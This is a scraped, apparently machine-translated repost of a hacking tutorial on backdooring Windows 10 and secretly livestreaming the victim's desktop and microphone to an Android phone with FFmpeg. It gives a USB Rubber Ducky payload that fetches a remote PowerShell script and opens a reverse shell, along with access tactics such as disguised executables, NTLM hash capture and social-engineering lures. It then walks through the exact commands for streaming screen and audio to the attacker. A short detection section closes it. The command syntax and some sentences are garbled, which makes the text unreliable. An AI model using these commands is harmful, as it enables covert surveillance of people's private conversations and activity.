قالب وردپرس درنا توس
Home / Tips and Tricks / How to Backdoor Windows 10 and Livestream the Desktop (Without RDP) «Null Byte :: WonderHowTo

How to Backdoor Windows 10 and Livestream the Desktop (Without RDP) «Null Byte :: WonderHowTo



The Windows 10 desktop and microphone can be live streamed without using the Remote Desktop Protocol (RDP) software and without opening ports on the target computer. A low-privilege hacker can monitor and filter in real-time all movements and private conversations of a destination, no matter where they are. Hackers see and hear, and there are few ways to protect yourself.

FFmpeg Attack Information

FFmpeg is a multimedia framework that can encode, stream and play most file formats on Windows, Mac OS and Unix distributions. It is a portable and stand-alone software, ie it can run as a single executable without installation or configuration.

The hacker installs the FFmpeg software on both the attacker's system and the Windows 1

0 target computer. You install a listener on the Android attack system that intercepts the incoming video stream from the Windows 10 computer. The video stream is saved to a local file and played back on the Android device.

Here's an example of a livestream created with a compromised Windows 10 desktop and intercepted with an Android phone. The framerate is slightly low, which was purposely done to minimize the CPU load on the target computer and create a smaller video file (AVI) on the Android.

Much like macOS can be hacked into the secretive livestream of the entire desktop, Windows 10 is also vulnerable to such attacks. Even at a low frame rate, an attacker can monitor every movement of a target in real time.

These attacks can be quickly performed without administrator rights by simply downloading the FFmpeg executable and running a single command. Everything expires without knowledge of the target or by anti-virus software.

Step 1: Backdoor of the Windows 10 Target Computer

This article assumes that a remote backdoor ( Netcat) has already been set up. There are several ways to control a Windows 10 device, including:

Option 1: USB Rubber Ducky

The USB Rubber Ducky is a popular keystroke injection tool. As shown in my other handbook on using an Android phone and USB Rubber Ducky on the backdoor of Windows 10, the Ducky payload below can set up a root shell within seconds using PowerShell.

  DELAY 5500
GUI r
DELAY 700
STRING Powershell / w 1 / C $ a = $ env: TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $ a  d.ps1; ipmo $ a  d.ps1; powercat -c 192.168.0.208 -p 1234 -e powershell
CTRL-SHIFT
DELAY 850
ALT y 

On Amazon: "USB Rubber Ducky: A Guide to Injection Attack Keys" by Darren Kitchen

Option 2: Bypassing the logon password

Similarly, if physical access is possible, A Windows 10 computer can be turned back to the starting directory by shutting down a malicious file.

Windows manages "startup" folders to start programs automatically at boot time. This is for convenience, and allows users to place legitimate application shortcuts (such as web browsers, word processors, media players) and scripts in the StartUp folder at any time. StartUp folders are often misused by attackers to ensure a degree of persistence for the device.

In my Guide to breaking into a Windows 10 computer without a password, the Windows 10 device is remotely controlled with a simple Msfvenom payload. Realistically, however, a more advanced, undetectable payload or sophisticated PowerShell payload would be used to maintain persistence.

Option 3: USB Dead Drop

USB Dead Drop is a useful technique for compromising computers. This topic is discussed in detail in my Guide which hacks WPA2 Wi-Fi passwords with USB dead-drop. The proposed payload is designed to exfiltrate Wi-Fi passwords, but can be replaced by other PowerShell payloads that can interact with Netcat listeners with no detectable payload, executables are displayed as normal PDF and TXT files. This allows the sending of malicious attachments by e-mail. Below is a GIF file of an executable file disguised as a text file.

Make no mistake, the file on the right is an executable file. When the fake text file is clicked, a new document opens with Notepad, the default text editor in Windows 10. After opening Notepad, an embedded PowerShell payload runs, creating a backdoor for the Windows 10 computer.

Option 5: Capture and Decrypt the Login Password

When a Wi-Fi network is shared with the Windows 10 target computer, NTLM hashes (shown in red below) can be intercepted.

NTLM credentials are based on data retrieved during the interactive sign-on process and consist of a domain name, user name, and one-way hash user password. NTLM uses an encrypted protocol to authenticate a user without sending the user's password over the network in plain text.

Unfortunately, the HMAC-MD5 hash algorithm used by NTLM is still very vulnerable to brute-forcing attacks, which allows tens of millions of password attempts per minute – even if the attack is done with older Android phones and Raspberry Pis ,

In my guide to intercepting and decrypting Windows passwords, the attack is treated in more detail. After the login password of the target is brutally enforced, it is possible to log in with the task or the StartUp folder and quickly embed a backdoor.

Option 6: Social Engineering (Other Tactics)

It is not clear in how many different ways a goal can be made to open a file containing stagers or payloads. Unobtrusive or otherwise unobtrusive items such as birthday cards or sticky notes can be used to lure and disarm unsuspecting goals. Everyday items can trigger complex social engineering hacks, as shown in my guide chopping Wi-Fi passwords with a birthday card.

Birthday card sent to destination, payload stored on microSD card.

The payload described in this article can also be replaced by another, more complex PowerShell script. It's the social engineering and human hacking aspect that should be considered.

Step 2: Setting Up the UserLAnd App on Android

UserLAnd is an Android app that allows the installation of Linux distributions in addition to the Android operating system. This is completely accomplished without rooting or deleting the Android device. Lightweight Kali or Debian operating systems can be up and running in minutes with just a few clicks.

A Kali operating system is required. For more information, see Distortion Guide to which turns an Android phone without a root device into a hacking device. and my guide to hacking WPA2 Wi-Fi passwords with Android. They both cover the basics of UserLAnd and the setup of Kali Linux, Ngrok, and the required software.

If you have everything installed and configured, connect to the operating system through ConnectBot (or JuiceSSH or the built-in SSH client)

Step 3: Install FFmpeg in Kali on Android

First, FFmpeg must be on be installed on the attacker's device to properly intercept the livestream of the hacked Windows 10 computer. Install FFmpeg with the following command in Kali (UserLAnd).

  sudo apt-get update & sudo apt-get install ffmpeg 

Step 4: Launch the FFmpeg Listener from Android

Command to start FFmpeg.

  screen ffmpeg -i udp: //0.0.0.0: 10001 /sdcard/Download/livestream.avi[19659046ThisscreenprecedesthecommandsothattheUserLAndSSHsessioncanbeterminatedwithoutstoppingtherunningFFmpcommandisusedtoteachreaderstolearnhowtouseScreenasthisfacilitatesthetransitionbetweentheshells

This FFmpeg command opens the UDP port ( udp: // ) 10001 and accepts input (] -i ) streams on any available interface ( 0.0. 0.0 ). Then the stream is saved in AVI format with the file name " livestream.avi " in the directory / sdcard / Download /. The port number and file name can be changed if necessary. However, always use the / sdcard / Download / directory to make the file available to the Android operating system and VLC app.

To disconnect from the screen session without stopping the FFmpeg Listener, press Ctrl-a then d .

Step 5: Install FFmpeg on the Windows 10 backdoor computer (19659003). All of the following commands in steps 5, 6, and 7 are executed using the Windows 10 backdoor device. These steps assume that a Netcat shell has been set up.

Run the following Invoke Webrequest command ( iwr ) to download the FFmpeg ZIP file to the Windows 10-based computer. At the time of this writing, the latest version is v20190506-fec4212. Using the Android web browser, go to ffmpeg.zeranoe.com/builds/ and copy the URL of the latest version from there.

  iwr -Uri # https: //ffmpeg.zeranoe .com / builds / win64 / static / ffmpeg-20190506-fec4212-win64-static.zip & # 39; -profile $ env: TEMP  ffmpeg. zip 

Invoke Webrequest loads ( -Uri ) the FFmpeg ZIP and save it ( -Outfile ) in the temporary directory ( $ env: TEMP ) with the file name ffmpeg.zip . Step 6: Extract the archive

PowerShell versions> 5.1 have a convenient decompression feature called the Expand archive . Expand Archive can be used to quickly unpack the ffmpeg.zip file in the Temp directory of the destination.

  Expand-Archive -Path $ env: TEMP  ffmpeg.zip -DestinationPath $ env: TEMP  ffmpeg  

Expand archive takes the input file ( $ env: TEMP ffmpeg.zip ) and unpack them into [ -DestinationPath ) into a new folder named ffmpeg . [19659004] When this is done, change ( cd ) to the new ffmpeg directory. Use the pathname (*) as follows to automatically complete the version number in the directory name.

  cd "$ env: TEMP  ffmpeg  ffmpeg *  bin " 

Then list the files in the directory to make sure ffmpeg.exe is available.

  ls 
  directory: C:  Users  IEUser  AppData  Local  Temp  ffmpeg  ffmpeg-20190116-51978ae-win64-static  bin

Mode LastWriteTime Length Name
---- ------------- ----------
-a 1/16/2019 4:14 AM 64969728 ffmpeg.exe
-a ---- 16.01.2014 04:14 64856064 ffplay.exe
-a ---- 1/16/2019 4:14 AM 64877568 ffprobe.exe 

As you can see, the executable is available. It is now possible to start the entire desktop of the target with livestream.

Step 7: Live streaming the Windows 10 desktop

FFmpeg supports several useful output formats. It can stream the entire desktop with or without audio through the target's microphone. The following deals with streaming video, audio only, video and audio at the same time.

Option 1: Video Streaming Only

To start streaming only the entire desktops of the target without using the following command ffmpeg.exe from the backdoor of Netcat.

.  ffmpeg.exe -f gdigrab -i desktop -f dshow -f avi udp: //192.168.0.208: 10001 [19659046] The Windows Components  Graphics Device Interface ( -f gdigrab ) and DirectShow ( -f dshow ) is responsible for displaying graphics and transmitting them to connected monitors and printers. FFmpeg essentially attacks these components ( -i desktop ) and sends the output ( udp: // ) to the server of the attacker in AVI ( -f avi ). format. 

When using the above command, remember to change the IP address of the attacker ( 192.168.0.208 ) to the IP address of the Android device that hosts the FFmpeg listener. Because the computer is live streaming, the video will be available in the Downloads Android app (or in the Downloads folder in Files, My Files, or a similarly named app).

Learn more about GDI and DirectShow and the available command arguments See the FFmpeg documentation for gdigrab, desktop, and dshow.

Option 2: Audio Streaming Only

In some scenarios, it may be more desirable to only stream the audio from the computers you are building. In this case, first list the available input interfaces that are built into the Windows 10 computer.

.  Ffmpeg.exe -list_devices true -f dshow -i dummy

ffmpeg version N-92981-g51978aefe8 Copyright (c) 2000-2019 by the FFmpeg developer
built with gcc 8.2.1 (GCC) 20181201

[dshow @ 0000021d3560a480] DirectShow Audio Devices
[dshow @ 0000021d3560a480] "Microphone (Realtek High Definition Audio)"
[dshow @ 0000021d3560a480] Alternate name "@device_cm_ {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}}  wave_ {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX}" 

Note the "Microphone (Realtek High Definition Audio)" interface in my FFmpeg edition. Depending on the type of hardware and microphone used by the backdoor Windows 10 computer, things may look different.

Copy the name of the audio interface exactly to the following command and type it in double quotes.

.  Ffmpeg .exe -f dshow -i audio = "Microphone (Realtek High Definition Audio)" -f avi udp: //192.168.0.208: 10001 

The argument -i indicates FFmpeg, to use] audio = Input while streaming to the server of the attacker.

Option 3: Video and Audio Streaming Simultaneously

Use the following command to stream the entire desktop while recording audio.

.  ffmpeg.exe -f dshow -i audio = "Microphone (Realtek High Definition Audio)": video = "desktop" -f avi udp: //192.168.0.208: 10001 

Similar to the audio = argument, here the two inputs video = and audio = are used for streaming to the server of the attacker. The input devices are separated by a colon (: ) and must always be placed in double quotes.

Step 8: Real-time Watch & Listen Stream

Built-in The Android video player can not play the streaming video / audio while the file is being actively created (streaming). There are other notable video players that can play video files this way. However, only VLC has been tested for this article. Feel free to replace it with another, equally suitable video player. VLC is available through the F-Droid Repository and the Google Play Store.

After installing VLC, go to the Android Downloads app (or the Downloads folder in Files, My Files, or a similarly named app) to get the livestream.avi. Note how the file size continues to increase when the file is streamed to the Windows 10 desktop.

To open the file in VLC, highlight the AVI file, select either the additional options icon plus "Open With" or the release key and press "VLC" or "Play with VLC". VLC will play the file as long as the FFmpeg connection is established.

How to protect yourself from FFmpeg attacks [19659003] It is unlikely that antivirus software will resist this type of attack on Windows 10. Finally, FFmpeg is not considered a malicious application, but a malicious application. Do not try to open ports or modify sensitive files on the computer.

Option 1: Search for potentially malicious apps

If you've never heard of FFmpeg and are sure that it was not installed by any other application, then FFmpeg probably has no business on the computer. A simple search helps to find related files on the computer.

First, open File Explorer and click "This PC" in the left column. This step is important. Otherwise, only the current directory is searched. Then look for "ffmpeg" in the upper right corner.

Note the FFmpeg EXE and characters in the Temp directory. At this point, it is probably best to disconnect the computer from the Internet and the router and begin forensic investigations of who and when the device was compromised.

Option 2: Use Task Manager to find apps that steal data [19659012] When the computer actively streams data live, you can use the Windows 10 Task Manager to run background processes, applications, and applications Show services. It can also be used to analyze system resources, for example to identify applications that consume too much RAM or CPU.

To open Task Manager, search for "Task Manager" and open it as an administrator by right-clicking on it. Task Manager must be started with administrator privileges to display everything that is executed from a root backdoor.

Note the use of "ffmpeg.exe" 30% of the CPU. An attacker of a patient can tweak the FFmpeg command to minimize the CPU's total load, so it may not always be detected this way.

To stop FFmpeg, right-click Click on the process and select the option "End task". Again, it is probably best to immediately disconnect the computer from the Internet and routers.

Option 3: Use Wireshark to find data-stealing apps

Remember that a clever attacker can rename the ffmpeg.exe file to something less obvious, such as "explorer.exe" or "service host." For a more complete overview of data leaving the Windows 10 computer, download and install the latest version of Wireshark. Be sure to install WinPcap during the installation process as this is a required dependency on Wireshark.

Open Wireshark and start recording all available interfaces. When an attacker actively transmits the desktop live, a large amount of data is seen from the network.

It Can Be Hard To Identify A large amount of data leaves the computer as malicious. Windows 10 does a number of things in the background, possibly interpreted as shady . The analysis of the individual packages will not help much either. If it is a FFmpeg attack, it can be identified (with certainty) using the following method.

First, right-click on one of the UDP packages and select "Follow", then "UDP Stream".

A new Wireshark window opens. Notice the "Client Pkts" in the lower left corner. This number will continue to increase when Wireshark assembles the UDP packets into a single stream. Be patient here. If the attacker has been in the livestream for a long time, it may take several minutes for Wireshark to complete.

When Wireshark finishes, the "View and Save Data As" option becomes available. Change the setting to "Raw" and wait for Wireshark to finish compiling again.

Then click the "Save As" button and save the data with the filename "ive_been_hacked.avi". The video can then be played by the Windows 10 video player. If AVI playback is clearly a video of the entire desktop or audio recordings of your private conversations, your computer has been hacked. Disconnect it immediately from the router.

Running and detecting FFmpeg attacks is sufficient. Follow me on Twitter @tokyoneon_ and let me know if you have any questions or concerns here or below in the comments.

Do not miss: Enter password-free Windows 10 computer

Title image and screenshots of Tokyoneon / Null Byte




Source link